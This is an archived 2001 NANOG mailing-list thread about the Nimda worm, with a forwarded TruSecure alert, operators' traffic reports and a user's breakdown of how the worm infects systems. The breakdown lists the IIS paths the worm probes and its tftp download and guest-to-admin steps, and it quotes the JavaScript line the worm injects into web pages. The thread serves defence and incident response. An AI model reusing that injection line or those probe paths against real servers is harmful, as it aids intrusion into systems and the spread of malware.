I received this warning from TruSecure regarding the latest worm attack. Mike Braun First American CREDCO -----Original Message----- TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm Date: September 18, 2001 Time: 1000 EDT RISK INDICES: Initial Assessment: RED HOT Threat: VERY HIGH, (rapidly increasing) Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0, 5.0, and internal networks. Cost: High, command execution is possible Vulnerable Systems: IIS 4.0 and 5.0 SUMMARY: A new IIS worm is spreading rapidly. Its working name is Nimda: W32.nimda.a.mm It started about 9am eastern time today, Tuesday,September 18, 2001, Mulitple sensors world-wide run by TruSecure corporation are getting multiple hundred hits per hour. And began at 9:08am am. The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for multiple vulnerabilities including: Almost all are get scripts, and a get msadc (cmd.exe) get_mem_bin vti_bin owssvr.dll Root.exe CMD.EXE ../ (Unicode) Getadmin.dll Default.IDA /Msoffice/ cltreq.asp This is not code red or a code red variant. The worm, like code red attempts to infect its local sub net first, then spreads beyond the local address space. It is spreading very rapidly. TruSecure believes that this worm will infect any IIS 4 and IIS 5 box with well known vulnerabilities. We believe that there are nearly 1Million such machines currently exposed to the Internet. Risks Indices: Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of Internet Web server hosts: TruSecure process and essential configurations should generally be protective. The vulnerability prevalence world-wide is very high Threat - VERY HIGH and Growing The rate of growth and spread is exceedingly rapid - significantly faster than any worm to date and significantly faster than any variant of Code red. Cost -- Unknown, probably moderate per infected system. The worm itself is a file called README.EXE, or ADMIN.DLL a 56K file which is advertised as an audio xwave mime type file. Other RISKS: There is risk of DOS of network segments by traffic volume alone There is large risk of successful attack to both Internet exposed IIS boxes and to developer and Intranet boxes inside of corporations. Judging by the Code Red II experience, we expect many subtle routes of infection leading to inside corporate infections. We cannot discount the coincidence of the date and time of release, exactly one week to (probably to the minute) as the World Trade Center attack . REPLICATION: There are at least three mechanisms of spread: The worm seems to spread both by a direct IIS across Internet (IP spread) It probably also spreads by local shares. (this is not known for sure at this time) There is also an email vector where README.EXE is sent via email to numerous accounts. Mitigations TruSecure essential practices should work. Block all email with EXE attachments Filter for README.EXE Make sure IIS boxes are well patched and hardened, or removed from both the Internet and Intranets. Make sure any developer computing platforms are not running IIS of any version (many do so by default if either. Disconnect mail from the Internet Advise users not to double click on any unexpected attachments. Update anti-virus when your vendor has the signature. -----Original Message----- From: Bryan Heitman [mailto:bryanh@communitech.net] Sent: Tuesday, September 18, 2001 8:22 AM To: nanog@merit.edu Subject: Re: Worm probes We're also seeing a large increase in this activity. This seems to be more severe than the first time. Have an additional 30 to 40 meg inbound from this. Best regards, Bryan Heitman CommuniTech.Net, Inc. ----- Original Message ----- From: <up@3.am> To: <nanog@merit.edu> Sent: Tuesday, September 18, 2001 10:05 AM Subject: Re: Worm probes
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
On Tue, 18 Sep 2001, deeann mikula wrote:
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one
point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT
worm
probes this morning? We're seeing about 8000/second, starting around 9:15 Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.
i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he discected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations telerama public access internet http://www.telerama.com 1.877.688.3200
James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am =========================================================================
"MMS <firstam.com>" made the following annotations on 09/18/01 08:34:15 ------------------------------------------------------------------------------ "THIS E-MAIL MESSAGE AND ANY FILES TRANSMITTED HEREWITH, ARE INTENDED SOLELY FOR THE USE OF THE INDIVIDUAL(S) ADDRESSED AND MAY CONTAIN CONFIDENTIAL, PROPRIETARY OR PRIVILEGED INFORMATION. IF YOU ARE NOT THE ADDRESSEE INDICATED IN THIS MESSAGE (OR RESPONSIBLE FOR DELIVERY OF THIS MESSAGE TO SUCH PERSON) YOU MAY NOT REVIEW, USE, DISCLOSE OR DISTRIBUTE THIS MESSAGE OR ANY FILES TRANSMITTED HEREWITH. IF YOU RECEIVE THIS MESSAGE IN ERROR, PLEASE CONTACT THE SENDER BY REPLY E-MAIL AND DELETE THIS MESSAGE AND ALL COPIES OF IT FROM YOUR SYSTEM." ==============================================================================
There is also an email vector where README.EXE is sent via email to numerous accounts.
It also seems to set the from address in both the envelope and header to an address, possibly from the address book(?). I've seen a number of bounces come back to one of our NOC addresses, and a couple of reports from humans. :( Rob
This is the information i've collected thus far on W32.nimda: W32.nimda is NOT a code red variant, and the people who referring to it as "Code Blue" were mistaken... The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses several vulnerabilities in Windows NT and 2000 server's to infect a server, and also employ's email and web site mobile code to infect Windows 9x/ME/NT/2k boxes. During the initial infection of a server, the worm does the following: - download a file named "admin.dll" via tftp from the system that is trying to infect the target - add the guest account to the local administrators group and activates the account - makes sure c$ is shared out - copies itself to c, d, and e drives - tries to mail itself to email addresses that it discovers on the server - creates a file named readme.exe, which is used in the mobile code inserted on the web sites below - add this string to the web pages found on the server: <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> - scans for and infects other vulnerable IIS servers - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only) If a user views a web site that is hosted on an infected server, the following happens: - upon viewing an infected page, the mobile code extracts to readme.exe and starts in windows media player (without user intervention) - the user's machine becomes infected with W32.nimda at this point and time - the worm starts scanning for other vulnerable IIS servers - the worm emails itself to everyone on the user's address book - goes through all shared directories and puts sample.nws, sample.eml, desktop.eml, desktop.nws in each directory. these are eml messages with copies of itself (readme.exe) autoloaded by the mobile html code mentioned above. - goes through all shared directories and puts riched20.dll in each directory, which is a trogjan dll version of W32.nimda that is meant to infect people running notepad/wordpad in that directory. - puts a trojan mmc.exe in the winnt directory that is a copy of itself in the above "readme.exe" format (win2000 only) It us unknown to me what happens (at this point in time) if a user opens an attachment that is sent from an infected site. It is possible that it could automatically infect the user's computer using the same methods mentioned above. EVERYONE who uses internet explorer to browse the internet should probably do one of two things to stop from being automatically infected by W32.nimda (i have not tested whether or not turning off javascript fixes the problem): o) don't browse web pages until microsoft releases a patch o) turn OFF javascript EVERYONE who uses outlook/outlook express should, at the very least, not open any attachments that they are not expecting. Turning off auto-preview might be a good idea as well. Slashdot has an article discussing this: http://slashdot.org/articles/01/09/18/151203.shtml On Tuesday 18 September 2001 11:33, Braun, Mike wrote:
I received this warning from TruSecure regarding the latest worm attack.
Mike Braun First American CREDCO
-----Original Message----- TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
Date: September 18, 2001 Time: 1000 EDT
RISK INDICES:
Initial Assessment: RED HOT
Threat: VERY HIGH, (rapidly increasing)
Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0, 5.0, and internal networks.
Cost: High, command execution is possible
Vulnerable Systems: IIS 4.0 and 5.0
SUMMARY: A new IIS worm is spreading rapidly. Its working name is Nimda: W32.nimda.a.mm
It started about 9am eastern time today, Tuesday,September 18, 2001, Mulitple sensors world-wide run by TruSecure corporation are getting multiple hundred hits per hour. And began at 9:08am am.
The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for multiple vulnerabilities including:
Almost all are get scripts, and a get msadc (cmd.exe) get_mem_bin vti_bin owssvr.dll Root.exe CMD.EXE ../ (Unicode) Getadmin.dll Default.IDA /Msoffice/ cltreq.asp
This is not code red or a code red variant.
The worm, like code red attempts to infect its local sub net first, then spreads beyond the local address space.
It is spreading very rapidly.
TruSecure believes that this worm will infect any IIS 4 and IIS 5 box with well known vulnerabilities. We believe that there are nearly 1Million such machines currently exposed to the Internet.
Risks Indices: Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of Internet Web server hosts: TruSecure process and essential configurations should generally be protective. The vulnerability prevalence world-wide is very high
Threat - VERY HIGH and Growing The rate of growth and spread is exceedingly rapid - significantly faster than any worm to date and significantly faster than any variant of Code red.
Cost -- Unknown, probably moderate per infected system.
The worm itself is a file called README.EXE, or ADMIN.DLL a 56K file which is advertised as an audio xwave mime type file.
Other RISKS: There is risk of DOS of network segments by traffic volume alone There is large risk of successful attack to both Internet exposed IIS boxes and to developer and Intranet boxes inside of corporations.
Judging by the Code Red II experience, we expect many subtle routes of infection leading to inside corporate infections.
We cannot discount the coincidence of the date and time of release, exactly one week to (probably to the minute) as the World Trade Center attack .
REPLICATION: There are at least three mechanisms of spread: The worm seems to spread both by a direct IIS across Internet (IP spread) It probably also spreads by local shares. (this is not known for sure at this time) There is also an email vector where README.EXE is sent via email to numerous accounts.
Mitigations TruSecure essential practices should work. Block all email with EXE attachments Filter for README.EXE Make sure IIS boxes are well patched and hardened, or removed from both the Internet and Intranets. Make sure any developer computing platforms are not running IIS of any version (many do so by default if either. Disconnect mail from the Internet Advise users not to double click on any unexpected attachments. Update anti-virus when your vendor has the signature.
-----Original Message----- From: Bryan Heitman [mailto:bryanh@communitech.net] Sent: Tuesday, September 18, 2001 8:22 AM To: nanog@merit.edu Subject: Re: Worm probes
We're also seeing a large increase in this activity. This seems to be more severe than the first time. Have an additional 30 to 40 meg inbound from this.
Best regards,
Bryan Heitman CommuniTech.Net, Inc. ----- Original Message ----- From: <up@3.am> To: <nanog@merit.edu> Sent: Tuesday, September 18, 2001 10:05 AM Subject: Re: Worm probes
ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this time of day, although still well short of capacity...apache server processor load is WAY up just from the requests, and the logs are growing like mad.
On Tue, 18 Sep 2001, deeann mikula wrote:
On Tue, 18 Sep 2001, ravi pina wrote:
On Tue, Sep 18, 2001 at 09:54:31AM -0400, sigma@pair.com said at one
point in time:
Has anyone else been seeing a dramatic increase in /scripts/.. NT
worm
probes this morning? We're seeing about 8000/second, starting
around 9:15
Eastern time, to and from a wide variety of addresses.
affirmative. i just looked at my logs, and it looks like each probe tries a bunch of things. i haven't seen much on the lists, but i'm looking right now.
i'm pretty sure that the worm's attack phase starts on the 20th (which of course, depends upon a correctly set system clock) and also that attempting to execute something like /scripts/root.ext/c++ something is involved.
i think that cert's website would be a good place to look. i'm *not* a security/virus chick, but i did host a talk by marty linder of cert where he discected code red's activity and presented a summary.
cert is of course, http://www.cert.org.
deeann m.m. mikula
director of operations telerama public access internet http://www.telerama.com 1.877.688.3200
James Smallacombe PlantageNet, Inc. CEO and Janitor up@3.am http://3.am =========================================================================
"MMS <firstam.com>" made the following annotations on 09/18/01 08:34:15 --------------------------------------------------------------------------- --- "THIS E-MAIL MESSAGE AND ANY FILES TRANSMITTED HEREWITH, ARE INTENDED SOLELY FOR THE USE OF THE INDIVIDUAL(S) ADDRESSED AND MAY CONTAIN CONFIDENTIAL, PROPRIETARY OR PRIVILEGED INFORMATION. IF YOU ARE NOT THE ADDRESSEE INDICATED IN THIS MESSAGE (OR RESPONSIBLE FOR DELIVERY OF THIS MESSAGE TO SUCH PERSON) YOU MAY NOT REVIEW, USE, DISCLOSE OR DISTRIBUTE THIS MESSAGE OR ANY FILES TRANSMITTED HEREWITH. IF YOU RECEIVE THIS MESSAGE IN ERROR, PLEASE CONTACT THE SENDER BY REPLY E-MAIL AND DELETE THIS MESSAGE AND ALL COPIES OF IT FROM YOUR SYSTEM."
=========================================================================== ===
-- "Computer games don't affect kids, I mean if Pacman affected us as kids, we'd all be running around in darkened rooms, munching pills, and listening to repetitive music." ~unknown **** Jim Olsen Systems Administrator CyberJunkees ****
participants (3)
-
Braun, Mike
-
Jim Olsen
-
Rob Evans